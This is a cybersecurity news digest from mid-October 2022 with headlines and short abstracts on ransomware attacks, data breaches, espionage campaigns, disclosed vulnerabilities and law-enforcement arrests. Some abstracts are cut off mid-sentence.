A bug in the message encryption mechanism used by Microsoft in Office 365 can allow to access the contents of the messages. Researchers at the cybersecurity firm WithSecure discovered a bug in the message encryption mechanism used by Microsoft...Security Affairs
October 18, 2022 – Criminals
Ransom Cartel linked to notorious REvil ransomware operation Full Text
Abstract
Threat analysts have connected the pieces that link the Ransom Cartel RaaS (ransomware-as-a-service) to the REvil gang, one of the most notorious and prolific ransomware groups in recent years.BleepingComputer
October 18, 2022 – Breach
Keystone Health Data Breach Impacts 235,000 Patients Full Text
Abstract
In a data breach notification published on its website, Keystone is disclosing a cybersecurity incident identified on August 19 and which has resulted in the disruption of some systems.Security Week
October 18, 2022 – Cryptocurrency
Сryptocurrency and Ransomware — The Ultimate Friendship Full Text
Abstract
Both cryptocurrency and ransomware are nothing new in the digital world; both have been there for a very long time, which was enough for them to find common pieces for starting their relationship. Ransomware can be like a virtual car that works on all types of fuels, and crypto is the one that is currently most recommended. No one can argue that 2020 was the year of ransomware in the cyber world, but it wasn't due to the fact that cybercriminals chose ransomware just because they knew how to attack properly. It's because of the fact that crypto rose mostly this year, along with the new normal of the digital world. It gave them a new cause to stick to ransomware, thanks to the anonymous payments that can be made using a cryptocurrency. How does ransomware work? Ransomware is a malware type that encrypts the victim's files, whether it's a random user or an organization, leading to denying them access to those files on their personal devices. And the key to gainingThe Hacker News
October 18, 2022 – Criminals
Law enforcement arrested 31 suspects for stealing cars by hacking key fobs Full Text
Abstract
An international law enforcement operation led by Europol disrupted a cybercrime ring focused on hacking wireless key fobs to steal cars. The French authorities in cooperation with their Spanish and Latvian peers, and with the support of Europol and Eurojust,...Security Affairs
October 18, 2022 – Government
FBI: Scammers likely to target US Student Loan Debt Relief applicants Full Text
Abstract
The FBI has released a warning that scammers may be targeting individuals seeking to enroll in the Federal Student Aid program to steal their personal information, payment details, and money.BleepingComputer
October 18, 2022 – Malware
PHP Malware Distributed as Cracked Microsoft Office Apps, Telegram Full Text
Abstract
The Zscaler ThreatLabz research team observed a PHP version of ‘Ducktail’ Infostealer distributed in the form of cracked application installer for a variety of applications including games, Microsoft Office applications, Telegram, and others.GB Hackers
October 18, 2022 – Malware
Chinese ‘Spyder Loader’ Malware Spotted Targeting Organizations in Hong Kong Full Text
Abstract
The China-aligned espionage-focused actor dubbed Winnti has set its sights on government organizations in Hong Kong as part of an ongoing campaign dubbed Operation CuckooBees . Active since at least 2007, Winnti (aka APT41, Barium, Bronze Atlas, and Wicked Panda) is the name designated to a prolific cyber threat group that carries out Chinese state-sponsored espionage activity, predominantly aimed at stealing intellectual property from organizations in developed economies. The threat actor's campaigns have targeted healthcare, telecoms, high-tech, media, agriculture, and education sectors, with infection chains primarily relying on spear-phishing emails with attachments to initially break into the victims' networks. Earlier this May, Cybereason disclosed long-running attacks orchestrated by the group since 2019 to siphon technology secrets from technology and manufacturing companies mainly located in East Asia, Western Europe, and North America. The intrusions, clubbThe Hacker News
October 18, 2022 – APT
China-linked APT41 group targets Hong Kong with Spyder Loader Full Text
Abstract
China-linked threat actors APT41 (a.k.a. Winnti) targeted organizations in Hong Kong, in some cases remaining undetected for a year. Symantec researchers reported that cyberespionage group APT41 targeted organizations in Hong Kong in a campaign that...Security Affairs
October 18, 2022 – Hacker
Hackers target Asian casinos in lengthy cyberespionage campaign Full Text
Abstract
A hacking group named 'DiceyF' has been observed deploying a malicious attack framework against online casinos based in Southeast Asia since at least November 2021.BleepingComputer
October 18, 2022 – Breach
Vinomofo Suffers Major Data Breach Full Text
Abstract
Online wine seller Vinomofo has disclosed a major data breach in which an intruder accessed customers’ personal information including names, dates of birth, addresses, and contact details.Sydney Morning Herald
October 18, 2022 – Criminals
European Police Arrest a Gang That Hacked Wireless Key Fobs to Steal Cars Full Text
Abstract
Law enforcement authorities in France, in collaboration with Spain and Latvia, have disrupted a cybercrime ring that leveraged a hacking tool to steal cars without having to use a physical key fob. "The criminals targeted vehicles with keyless entry and start systems, exploiting the technology to get into the car and drive away," Europol said in a press statement. The coordinated operation, which took place on October 10, 2022, resulted in the arrest of 31 suspects from across 22 locations in the three nations, including software developers, its resellers, and the car thieves who used the tool to break into vehicles. Also confiscated by the officials as part of the arrests were criminal assets worth €1,098,500, not to mention an internet domain that allegedly advertised the service online. Per Europol, the criminals are said to have singled out keyless vehicles from two unnamed French car manufacturers. The perpetrators then used the fraudulent package to replace theThe Hacker News
October 18, 2022 – Vulnerabilities
Critical Remote Code Execution issue impacts popular post-exploitation toolkit Cobalt Strike Full Text
Abstract
HelpSystems, the company that developed the Cobalt Strike platform, addressed a critical remote code execution vulnerability in its software. HelpSystems, the company that developed the commercial post-exploitation toolkit Cobalt Strike, addressed...Security Affairs
October 18, 2022 – Breach
Verizon notifies prepaid customers their accounts were breached Full Text
Abstract
Verizon warned an undisclosed number of prepaid customers that attackers gained access to Verizon accounts and used exposed credit card info in SIM swapping attacks.BleepingComputer
October 18, 2022 – Breach
New Data Leaks Add to Australia’s Data Security Reckoning Full Text
Abstract
Personal data from MyDeal[.]com[.]au, a marketplace owned by Australia's largest grocery chain Woolworths Group, has appeared for sale on a data leak forum. The data breach appears to be legitimate as per Troy Hunt, a data breach expertBank Info Security
October 18, 2022 – Vulnerabilities
Critical RCE Vulnerability Discovered in Popular Cobalt Strike Hacking Software Full Text
Abstract
HelpSystems, the company behind the Cobalt Strike software platform, has released an out-of-band security update to address a remote code execution vulnerability that could allow an attacker to take control of targeted systems. Cobalt Strike is a commercial red-team framework that's mainly used for adversary simulation, but cracked versions of the software have been actively abused by ransomware operators and espionage-focused advanced persistent threat (APT) groups alike. The post-exploitation tool consists of a team server, which functions as a command-and-control (C2) component, and a beacon, the default malware used to create a connection to the team server and drop next-stage payloads. The issue, tracked as CVE-2022-42948 , affects Cobalt Strike version 4.7.1, and stems from an incomplete patch released on September 20, 2022, to rectify a cross-site scripting ( XSS ) vulnerability ( CVE-2022-39197 ) that could lead to remote code execution. "The XSS vulnerabiThe Hacker News
October 18, 2022 – Vulnerabilities
Over 17000 Fortinet devices exposed online are very likely vulnerable to CVE-2022-40684 Full Text
Abstract
Fortinet confirmed that many systems are still vulnerable to attacks exploiting the CVE-2022-40684 zero-day vulnerability. Fortinet is urging customers to address the recently discovered CVE-2022-40684 zero-day vulnerability. Unfortunately, the number...Security Affairs
October 18, 2022 – Vulnerabilities
Text message verification flaws in your Windows Active Directory Full Text
Abstract
While text messaging-based MFA goes a long way toward protecting an org against compromised credentials, it also has vulnerabilities of its own. Orgs must look for ways around the flaws associated with test-based MFA by upgrading to multi-factor authentication. Learn more in this article from Specops Software.BleepingComputer
October 18, 2022 – Vulnerabilities
Researchers Keep a Wary Eye on Critical New Vulnerability in Apache Commons Text Full Text
Abstract
Researchers are closely tracking a critical, newly disclosed vulnerability in Apache Commons Text that gives unauthenticated attackers a way to execute code remotely on servers running applications with the affected component.Dark Reading
October 18, 2022 – Vulnerabilities
CVE-2022-28762: Zoom for macOS contains a debugging port misconfiguration Full Text
Abstract
Video messaging company Zoom fixed a high-severity vulnerability, tracked as CVE-2022-28762, in Zoom Client for Meetings for macOS. Zoom Client for Meetings for macOS (Standard and for IT Admin) is affected by a debugging port misconfiguration. The issue,...Security Affairs
October 18, 2022 – Solution
DuckDuckGo for Mac enters public beta, now available to everyone Full Text
Abstract
Mac users can now try the privacy features in the DuckDuckGo browser as the app has entered the beta stage of development.BleepingComputer
October 18, 2022 – Breach
Hackers compromised Hong Kong govt agency network for a year Full Text
Abstract
Researchers at Symantec have uncovered cyberattacks attributed to the China-linked espionage actor APT41 (a.k.a. Winnti) that breached government agencies in Hong Kong and remained undetected for a year in some cases.BleepingComputer
October 17, 2022 – Malware
Malware dev claims to sell new BlackLotus Windows UEFI bootkit Full Text
Abstract
A threat actor is selling on hacking forums what they claim to be a new UEFI bootkit named BlackLotus, a malicious tool with capabilities usually linked to state-backed threat groups.BleepingComputer
October 17, 2022 – Phishing
Ducktail Tricks Victims to Steal Facebook Admin Credentials Full Text
Abstract
A newly-launched phishing campaign by Ducktail operators is spreading malware via fake lures for games, subtitle files, adult videos, and cracked MS Office applications. The info-stealer, written in PHP, focuses on stealing Facebook account data and any valuable information stored in users’ account ... Read MoreCyware Alerts - Hacker News
October 17, 2022 – Hacker
Black Basta Ransomware Hackers Infiltrates Networks via Qakbot to Deploy Brute Ratel C4 Full Text
Abstract
The threat actors behind the Black Basta ransomware family have been observed using the Qakbot trojan to deploy the Brute Ratel C4 framework as a second-stage payload in recent attacks. The development marks the first time the nascent adversary simulation software is being delivered via a Qakbot infection, cybersecurity firm Trend Micro said in a technical analysis released last week. The intrusion, achieved using a phishing email containing a weaponized link pointing to a ZIP archive, further entailed the use of Cobalt Strike for lateral movement. While these legitimate utilities are designed for conducting penetration testing activities, their ability to offer remote access has made them a lucrative tool in the hands of attackers looking to stealthily probe the compromised environment without attracting attention for extended periods of time. This has been compounded by the fact that a cracked version of Brute Ratel C4 began circulating last month across the cybercrimiThe Hacker News
October 17, 2022 – Breach
Retail giant Woolworths discloses data breach of MyDeal online marketplace Full Text
Abstract
Australian retail giant Woolworths disclosed a data breach that impacted approximately 2.2 million MyDeal customers. Bad news for the customers of the MyDeal online marketplace, the Australian retail giant Woolworths disclosed a data breach that impacted...Security Affairs
October 17, 2022 – Breach
MyDeal data breach impacts 2.2M users, stolen data for sale online Full Text
Abstract
Woolworths' MyDeal subsidiary has disclosed a data breach affecting 2.2 million customers, with the hacker trying to sell the stolen data on a hacker forum.BleepingComputer
October 17, 2022 – Ransomware
Magniber Ransomware Learns New Techniques, Targets Home Users Full Text
Abstract
A new Magniber campaign was found delivering fake Windows 10 and antivirus software updates to target home users, while staying undetected. Post-encryption the attackers demand a ransom of up to $2,500. In April 2022, Magniber was spotted spreading as a Windows 10 update through malicious websites. ... Read MoreCyware Alerts - Hacker News
October 17, 2022 – Vulnerabilities
Researchers Say Microsoft Office 365 Uses Broken Email Encryption to Secure Messages Full Text
Abstract
New research has disclosed what's being called a security vulnerability in Microsoft 365 that could be exploited to infer message contents due to the use of a broken cryptographic algorithm. "The [Office 365 Message Encryption] messages are encrypted in insecure Electronic Codebook ( ECB ) mode of operation," Finnish cybersecurity company WithSecure said in a report published last week. Office 365 Message Encryption (OME) is a security mechanism used to send and receive encrypted email messages between users inside and outside an organization without revealing anything about the communications themselves. A consequence of the newly disclosed issue is that rogue third-parties gaining access to the encrypted email messages may be able to decipher the messages, effectively breaking confidentiality protections. Electronic Codebook is one of the simplest modes of encryption wherein each message block is encoded separately by a key, meaning identical plaintext blocks wiThe Hacker News
October 17, 2022 – Malware
New UEFI rootkit Black Lotus offered for sale at $5,000 Full Text
Abstract
Black Lotus is a new, powerful Windows UEFI rootkit advertised on underground criminal forums, researcher warns. Cybersecurity researcher Scott Scheferman reported that a new Windows UEFI rootkit, dubbed Black Lotus, is advertised on underground criminal...Security Affairs
October 17, 2022 – Vulnerabilities
Windows Mark of the Web bypass zero-day gets unofficial patch Full Text
Abstract
A free unofficial patch has been released through the 0patch platform to address an actively exploited zero-day flaw in the Windows Mark of the Web (MotW) security mechanism.BleepingComputer
October 17, 2022 – Ransomware
Ukraine, Poland Orgs Targeted by New Prestige Ransomware Full Text
Abstract
Microsoft Threat Intelligence Center discovered a new ransomware attack campaign directed at the transportation and logistics entities in Ukraine and Poland. For now, researchers have attributed the infections to an unnamed cluster - DEV-0960. They are also clueless about the method of initial acce ... Read MoreCyware Alerts - Hacker News
October 17, 2022 – Cryptocurrency
Why Crypto Winter is No Excuse to Let Your Cyber Defenses Falter Full Text
Abstract
Don't let the ongoing " crypto winter " lull you into a false sense of cybersecurity. Even as cryptocurrencies lose value — and some crypto companies file for bankruptcy — cryptojacking still poses an urgent threat to enterprises across industries, from financial services to healthcare to industry 4.0 and beyond. Broadly speaking, cryptojacking is defined as the unauthorized and illegitimate use of an unwitting party's compute and/or server power by a malicious actor to mine cryptocurrencies. While everyone with an internet connection is technically vulnerable to cryptojacking, most attacks target enterprises with significant compute resources, especially those with an outsized number of third-party relationships. (More on that last part in a bit.) And if a malicious actor can breach your cybersecurity defenses for cryptojacking purposes, they can breach them for any number of nefarious reasons. Under normal conditions, mining for cryptocurrency is hugely expensive because dThe Hacker News
October 17, 2022 – Attack
Japanese tech firm Oomiya hit by LockBit 3.0. Multiple supply chains potentially impacted Full Text
Abstract
The IT infrastructure of the Japanese tech company Oomiya was infected with the LockBit 3.0 ransomware. One of the affiliates for the LockBit 3.0 RaaS hit the Japanese tech company Oomiya. Oomiya is focused on designing and manufacturing microelectronics and...Security Affairs
October 17, 2022 – Attack
Australian insurance firm Medibank confirms ransomware attack Full Text
Abstract
Health insurance provider Medibank has confirmed that a ransomware attack is responsible for last week's cyberattack and disruption of online services.BleepingComputer
October 17, 2022 – Malware
Copybara Malware Uses Vishing Tricks to Target Italian Banking Users Full Text
Abstract
Researchers at ThreatFabric uncovered an Android banking malware attack phishing users for their contact details and sensitive banking data. The malware, dubbed Copybara, can extract usernames and passwords for multiple banking accounts. The attack begins with an SMS phishing message purported to a ... Read MoreCyware Alerts - Hacker News
October 17, 2022 – Ransomware
New Prestige Ransomware Targeting Polish and Ukrainian Organizations Full Text
Abstract
A new ransomware campaign targeted the transportation and logistics sectors in Ukraine and Poland on October 11 with a previously unknown payload dubbed Prestige . "The activity shares victimology with recent Russian state-aligned activity, specifically on affected geographies and countries, and overlaps with previous victims of the FoxBlade malware (also known as HermeticWiper)," the Microsoft Threat Intelligence Center (MSTIC) said . The tech giant remarked the intrusions occurred within an hour of each other across all victims, attributing the infections to an unnamed cluster called DEV-0960. It did not disclose the scale of the attacks, but stated it's notifying all affected customers. The campaign is also believed to be distinct from other recent destructive attacks that have involved the use of HermeticWiper and CaddyWiper , the latter of which is launched by a malware loader called ArguePatch (aka AprilAxe). The method of initial access remains unknoThe Hacker News
October 17, 2022 – Attack
Bulgaria hit by a cyber attack originating from Russia Full Text
Abstract
Government institutions in Bulgaria have been hit by a cyber attack during the weekend, experts believe it was launched by Russian threat actors. The infrastructure of government institutions in Bulgaria has been hit by a massive DDoS attack. The attack...Security Affairs
October 17, 2022 – Criminals
Police dismantles criminal ring that hacked keyless cars Full Text
Abstract
Authorities from France, Latvia, and Spain arrested 31 suspects believed to be part of a car theft ring that targeted vehicles from two French car manufacturers.BleepingComputer
October 17, 2022 – General
National Cybersecurity Awareness Month: Don’t Fear the Cyber Goonies Full Text
Abstract
User education has always been seen as a critical part of any cybersecurity plan. That’s because most cyber attacks still start with phishing, usually as an email trying to lure the user into giving up their password or other critical information.Cisco
October 17, 2022 – Vulnerabilities
Zimbra Releases Patch for Actively Exploited Vulnerability in its Collaboration Suite Full Text
Abstract
Zimbra has released patches to contain an actively exploited security flaw in its enterprise collaboration suite that could be leveraged to upload arbitrary files to vulnerable instances. Tracked as CVE-2022-41352 (CVSS score: 9.8), the issue affects a component of the Zimbra suite called Amavis , an open source content filter, and more specifically, the cpio utility it uses to scan and extract archives. The flaw, in turn, is said to be rooted in another underlying vulnerability ( CVE-2015-1197 ) that was first disclosed in early 2015, which according to Flashpoint was rectified, only to be subsequently reverted in later Linux distributions. "An attacker can use cpio package to gain incorrect access to any other user accounts," Zimbra said in an advisory published last week, adding it "recommends pax over cpio." Fixes are available in the following versions - Zimbra 9.0.0 Patch 27 Zimbra 8.8.15 Patch 34 All an adversary seeking needs to do to weapoThe Hacker News
October 17, 2022 – Criminals
Interpol arrested 75 members of the cybercrime ring Black Axe Full Text
Abstract
Interpol has announced the arrests of 75 individuals as part of a coordinated international operation against an organized cybercrime ring called Black Axe. Interpol arrested 75 individuals as part of a coordinated global operation, codenamed Operation...Security Affairs
October 17, 2022 – Outage
Ransomware attack halts circulation of some German newspapers Full Text
Abstract
German newspaper 'Heilbronn Stimme' published today's 28-page issue in e-paper form after a Friday ransomware attack crippled its printing systems.BleepingComputer
October 17, 2022 – Attack
Ransomware Actors Target a Major Indian Pharma Company Full Text
Abstract
Leaked data from Aarti Drugs includes business and administration data, including loan documents, and tax filing information. Whereas, stolen data from Ipca Laboratories includes employee records, formulation data, and financial and audit reports.The Times Of India
October 17, 2022 – Criminals
INTERPOL-led Operation Takes Down ‘Black Axe’ Cyber Crime Organization Full Text
Abstract
The International Criminal Police Organization, also called the Interpol, has announced the arrests of 75 individuals as part of a coordinated global operation against an organized cyber crime syndicate called Black Axe . "'Black Axe' and other West African organized crime groups have developed transnational networks, defrauding victims of millions while channeling their profits into lavish lifestyles and other criminal activities, from drug trafficking to sexual exploitation," the agency said . The law enforcement effort, codenamed Operation Jackal, involved the participation of Argentina, Australia, Côte d'Ivoire, France, Germany, Ireland, Italy, Malaysia, Nigeria, Spain, South Africa, the U.A.E, the U.K., and the U.S. Two of the alleged online scammers, who were arrested late last month in South Africa, are believed to have orchestrated a variety of fraudulent schemes that netted them $1.8 million from victims. The probe further led to 49 property searcThe Hacker News
October 17, 2022 – Vulnerabilities
45,654 VMware ESXi servers reached End of Life on Oct. 15 Full Text
Abstract
Lansweeper warns that over 45,000 VMware ESXi servers exposed online have reached end-of-life (EOL), making them an easy target for attackers. IT Asset Management software provider Lansweeper has scanned the Internet for VMware ESXi servers and found...Security Affairs
October 17, 2022 – Attack
Japanese Tech firm Oomiya Hit by LockBit 3.0; Supply Chains Impacted Full Text
Abstract
Lockbit 3.0 operators claim to have stolen data from the company and threaten to leak it by October 20, 2022 if the company will not pay the ransom. At this time, the ransomware gang has yet to publish samples of the alleged stolen documents.Security Affairs
October 17, 2022 – Malware
New ‘Black Lotus’ UEFI Rootkit Provides APT-Level Capabilities to Cybercriminals Full Text
Abstract
Black Lotus provides a full set of capabilities to attackers, including file transfer and tasking support, and can potentially become a major threat across IT and OT environments.Security Week
October 16, 2022 – Ransomware
Venus Ransomware targets publicly exposed Remote Desktop services Full Text
Abstract
Threat actors behind the relatively new Venus Ransomware are hacking into publicly-exposed Remote Desktop services to encrypt Windows devices.BleepingComputer
October 16, 2022 – Ransomware
Mysterious Prestige ransomware targets organizations in Ukraine and Poland Full Text
Abstract
Microsoft warns that new Prestige ransomware is targeting transportation and logistics organizations in Ukraine and Poland. Microsoft reported that new Prestige ransomware is being used in attacks aimed at transportation and logistics organizations...Security Affairs
October 16, 2022 – Malware
New PHP information-stealing malware targets Facebook accounts Full Text
Abstract
Threat analysts have spotted a new Ducktail campaign using a new infostealer variant and novel TTPs (tactics, techniques, and procedures), while the Facebook users it targets are no longer limited to holders of business accounts.BleepingComputer
October 16, 2022 – Attack
Threat actors hacked hundreds of servers by exploiting Zimbra CVE-2022-41352 bug Full Text
Abstract
Threat actors have compromised hundreds of servers exploiting critical flaw CVE-2022-41352 in Zimbra Collaboration Suite (ZCS). Last week, researchers from Rapid7 warned of the exploitation of unpatched zero-day remote code execution vulnerability,...Security Affairs
October 16, 2022 – General
Security Affairs newsletter Round 389 Full Text
Abstract
A new round of the weekly SecurityAffairs newsletter arrived! Every week the best security articles from Security Affairs free for you in your email box. If you want to also receive for free the newsletter with the international press subscribe here. New...Security Affairs
October 15, 2022 – Attack
Indian Energy Company Tata Power’s IT Infrastructure Hit By Cyber Attack Full Text
Abstract
Tata Power Company Limited, India's largest integrated power company, on Friday confirmed it was targeted by a cyberattack. The intrusion on IT infrastructure impacted "some of its IT systems," the company said in a filing with the National Stock Exchange (NSE) of India. It further said it has taken steps to retrieve and restore the affected machines, adding it put in place security guardrails for customer-facing portals to prevent unauthorized access. The Mumbai-based electric utility company, part of the Tata Group conglomerate, did not disclose any further details about the nature of the attack, or when it took place. That said, cybersecurity firm Recorded Future in April disclosed attacks mounted by China-linked adversaries targeting Indian power grid organizations. The network intrusions are said to have been aimed at "at least seven Indian State Load Despatch Centres (SLDCs) responsible for carrying out real-time operations for grid control and electThe Hacker News
October 15, 2022 – Vulnerabilities
Over 45,000 VMware ESXi servers just reached end-of-life Full Text
Abstract
Over 45,000 VMware ESXi servers inventoried by Lansweeper just reached end-of-life (EOL), with VMware no longer providing software and security updates unless companies purchase an extended support contract.BleepingComputer
October 15, 2022 – Vulnerabilities
Fortinet urges admins to patch bug with public exploit immediately Full Text
Abstract
Fortinet urges customers to urgently patch their appliances against a critical authentication bypass FortiOS, FortiProxy, and FortiSwitchManager vulnerability exploited in attacks.BleepingComputer
October 15, 2022 – Malware
New PHP Version of Ducktail info-stealer hijacks Facebook Business accounts Full Text
Abstract
Experts spotted a PHP version of an information-stealing malware called Ducktail spread as cracked installers for legitimate apps and games. Zscaler researchers discovered a PHP version of an information-stealing malware tracked as Ducktail. The malicious...Security Affairs
October 15, 2022 – Attack
Almost 900 servers hacked using Zimbra zero-day flaw Full Text
Abstract
Almost 900 servers have been hacked using a critical Zimbra Collaboration Suite (ZCS) vulnerability, which at the time was a zero-day without a patch for nearly 1.5 months.BleepingComputer
October 15, 2022 – Vulnerabilities
Palo Alto Networks fixed a high-severity auth bypass flaw in PAN-OS Full Text
Abstract
Palo Alto Networks addressed a high-severity authentication bypass vulnerability affecting the PAN-OS 8.1 software. Palo Alto Networks released security patches to address a high-severity authentication bypass flaw, tracked as CVE-2022-0030 (CVSS...Security Affairs
October 15, 2022 – Attack
Indian power generation giant Tata Power hit by a cyber attack Full Text
Abstract
Tata Power Company Limited, India's largest power generation company, announced it was hit by a cyberattack. Tata Power on Friday announced that was hit by a cyber attack. Threat actors hit the Information Technology (IT) infrastructure of the company. The...Security Affairs
October 15, 2022 – Attack
Tata Power, a top power producer in India, confirms cyberattack Full Text
Abstract
Tata Power, a leading power generation company in India, has confirmed it was hit by a cyberattack. In a brief statement, the Mumbai-based company said that the attack impacted some of its IT systems.Tech Crunch
October 14, 2022 – Ransomware
The Week in Ransomware - October 14th 2022 - Bitcoin Trickery Full Text
Abstract
This week's news is action-packed, with police tricking ransomware into releasing keys to victims calling ransomware operations liars.BleepingComputer
October 14, 2022 – Vulnerabilities
Researchers Detail Windows Zero-Day Vulnerability Patched Last Month Full Text
Abstract
Details have emerged about a now-patched security flaw in Windows Common Log File System (CLFS) that could be exploited by an attacker to gain elevated permissions on compromised machines. Tracked as CVE-2022-37969 (CVSS score: 7.8), the issue was addressed by Microsoft as part of its Patch Tuesday updates for September 2022, while also noting that it was being actively exploited in the wild. "An attacker must already have access and the ability to run code on the target system," the company noted in its advisory. "This technique does not allow for remote code execution in cases where the attacker does not already have that ability on the target system." It also credited researchers from CrowdStrike, DBAPPSecurity, Mandiant, and Zscaler for reporting the vulnerability without delving into additional specifics surrounding the nature of the attacks. Now, the Zscaler ThreatLabz researcher team has disclosed that it captured an in-the-wild exploit for the theThe Hacker News
October 14, 2022 – Vulnerabilities
Experts disclose technical details of now-patched CVE-2022-37969 Windows Zero-Day Full Text
Abstract
Researchers disclosed details of a now-patched flaw, tracked as CVE-2022-37969, in Windows Common Log File System (CLFS). The CVE-2022-37969 (CVSS score: 7.8) flaw is a Windows Common Log File System Driver Elevation of Privilege Vulnerability. The Common...Security Affairs
October 14, 2022 – Criminals
Police tricks DeadBolt ransomware out of 155 decryption keys Full Text
Abstract
The Dutch National Police, in collaboration with cybersecurity firm Responders.NU, tricked the DeadBolt ransomware gang into handing over 155 decryption keys by faking ransom payments.BleepingComputer
October 14, 2022 – Malware
New Alchimist C2 Framework Targets Windows, Linux, macOS Full Text
Abstract
A new attack and C2 framework, dubbed Alchimist, was found capable of targeting Linux, macOS, and Windows systems. It can run arbitrary commands and perform remote shellcode execution. These kinds of frameworks have high quality, rich features, good detection evasion capabilities, and effective imp ... Read MoreCyware Alerts - Hacker News
October 14, 2022 – Hacker
New Chinese Cyberespionage Group Targeting IT Service Providers and Telcos Full Text
Abstract
Telecommunications and IT service providers in the Middle East and Asia are being targeted by a previously undocumented Chinese-speaking threat group dubbed WIP19 . The espionage-related attacks are characterized by the use of a stolen digital certificate issued by a Korean company called DEEPSoft to sign malicious artifacts deployed during the infection chain to evade detection. "Almost all operations performed by the threat actor were completed in a 'hands-on keyboard' fashion, during an interactive session with compromised machines," SentinelOne researchers Joey Chen and Amitai Ben Shushan Ehrlich said in a report this week. "This meant the attacker gave up on a stable [command-and-control] channel in exchange for stealth." WIP, short for work-in-progress, is the moniker assigned by SentinelOne to emerging or hitherto unattributed activity clusters, similar to the UNC####, DEV-####, and TAG-## designations given by Mandiant, Microsoft, and RecoThe Hacker News
October 14, 2022 – APT
WIP19, a new Chinese APT targets IT Service Providers and Telcos Full Text
Abstract
Chinese-speaking threat actor, tracked as WIP19, is targeting telecommunications and IT service providers in the Middle East and Asia. SentinelOne researchers uncovered a new threat cluster, tracked as WIP19, which has been targeting telecommunications...Security Affairs
October 14, 2022 – Ransomware
Microsoft: New Prestige ransomware targets orgs in Ukraine, Poland Full Text
Abstract
Microsoft says new Prestige ransomware is being used to target transportation and logistics organizations in Ukraine and Poland in ongoing attacks.BleepingComputer
October 14, 2022 – Malware
YoWhatsApp - An Unofficial WhatsApp App Steals Credentials Full Text
Abstract
A malicious version of the popular WhatsApp messaging app was found dropping an Android trojan known as Triada. Named YoWhatsApp, the unofficial app offers the ability to lock chats, send texts to unsaved numbers, and customize using different themes. It is spread to users via fraudulent ads on Sna ... Read MoreCyware Alerts - Hacker News
October 14, 2022 – Malware
New PHP Version of Ducktail Malware Hijacking Facebook Business Accounts Full Text
Abstract
A PHP version of an information-stealing malware called Ducktail has been discovered in the wild being distributed in the form of cracked installers for legitimate apps and games, according to the latest findings from Zscaler. "Like older versions (.NetCore), the latest version (PHP) also aims to exfiltrate sensitive information related to saved browser credentials, Facebook account information, etc.," Zscaler ThreatLabz researchers Tarun Dewan and Stuti Chaturvedi said . Ducktail, which emerged on the threat landscape in late 2021, is attributed to an unnamed Vietnamese threat actor, with the malware primarily designed to hijack Facebook business and advertising accounts. The financially motivated cybercriminal operation was first documented by Finnish cybersecurity company WithSecure (formerly F-Secure) in late July 2022. While previous versions of the malware were found to use Telegram as a command-and-control (C2) channel to exfiltrate information, the PHP varThe Hacker News
October 14, 2022 – Vulnerabilities
Experts released PoC exploit code for critical bug CVE-2022-40684 in Fortinet products Full Text
Abstract
Experts released the PoC exploit code for the authentication bypass flaw CVE-2022-40684 in FortiGate firewalls and FortiProxy web proxies. A proof-of-concept (PoC) exploit code for the authentication bypass vulnerability CVE-2022-40684 (CVSS score:...Security Affairs
October 14, 2022 – Policy and Law
Student jailed for hacking female classmates’ email, Snapchat accounts Full Text
Abstract
On Thursday, a Puerto Rico judge sentenced a former University of Puerto Rico (UPR) student to 13 months in prison for hacking over a dozen email and Snapchat accounts of female colleagues.BleepingComputer
October 14, 2022 – Ransomware
Ransom Cartel Ransomware: A Possible Connection With REvil Full Text
Abstract
Ransom Cartel is ransomware as a service (RaaS) that surfaced in mid-December 2021. This ransomware performs double extortion attacks and exhibits several similarities and technical overlaps with REvil ransomware.Palo Alto Networks
October 14, 2022 – General
How To Build a Career as a Freelance Cybersecurity Analyst — From Scratch Full Text
Abstract
With each passing year, the cybersecurity threat landscape continues to worsen. That reality makes cybersecurity analysts some of the most sought-after technology professionals in the world. And there are nowhere near enough of them to meet the demand. At last count, there were over 3.5 million unfilled cybersecurity jobs worldwide — and that number is still growing. The situation means that it's a great time to become a cybersecurity analyst. What's more, the skyrocketing demand means it's possible to start a lucrative freelance career in the field and take complete control over your professional future. Here's a start-to-finish guide on how to do exactly that. Start With the Right Training The first step on the path to becoming a freelance cybersecurity analyst is to acquire the necessary skills. For those without an existing technology background, the best place to start is with a cybersecurity bootcamp. They're designed to get newcomers up to speed with baThe Hacker News
October 14, 2022 – Breach
DJI drone tracking data exposed in the US Full Text
Abstract
Over 80,000 drone IDs were exposed in the leak of a database containing information from airspace monitoring devices manufactured by DJI. Original post at CyberNews: https://cybernews.com/privacy/dji-drone-tracking-data-exposed-in-us/ Over 80,000...Security Affairs
October 14, 2022 – Government
CISA releases open-source ‘RedEye’ C2 log visualization tool Full Text
Abstract
The U.S. Cybersecurity and Infrastructure Security (CISA) agency has announced RedEye, an open-source analytic tool for operators to visualize and report command and control (C2) activity.BleepingComputer
October 14, 2022 – Breach
DJI drone tracking data exposed in the US Full Text
Abstract
Over 80,000 drone IDs were exposed in a data leak after a database containing information from dozens of airspace monitoring devices manufactured by the Chinese-owned DJI was left accessible to the public.Security Affairs
October 14, 2022 – Criminals
INTERPOL arrests ‘Black Axe’ cybercrime syndicate members Full Text
Abstract
INTERPOL has arrested over 70 suspected members of the 'Black Axe' cybercrime syndicate, with two believed to be responsible for $1.8 million in financial fraud.BleepingComputer
October 14, 2022 – Breach
Australian police secret agents exposed in Colombian data leak Full Text
Abstract
Identities of secret agents working for the Australian Federal Police (AFP) have been exposed after hackers leaked documents stolen from the Colombian government.BleepingComputer
October 14, 2022 – Vulnerabilities
Microsoft Office 365 email encryption could expose message content Full Text
Abstract
Security researchers at WithSecure have discovered it's possible to partially or fully infer the contents of encrypted messages sent through Microsoft Office 365, highlighting an intrinsic weakness in the encryption scheme used.BleepingComputer
October 14, 2022 – Hacker
Operators Behind IcedID Trojan Diversify their Delivery Tactics Full Text
Abstract
Threat actors behind the IcedID malware have been found using a variety of propagation methods, including changing the management of C2 server IPs, in their phishing campaigns. The attackers were found registering fresh domains for C2, instead of relying on the old ones.Cyware Alerts - Hacker News
October 14, 2022 – Botnet
Mirai Botnet Hits Wynncraft Minecraft Server with 2.5 Tbps DDoS Attack Full Text
Abstract
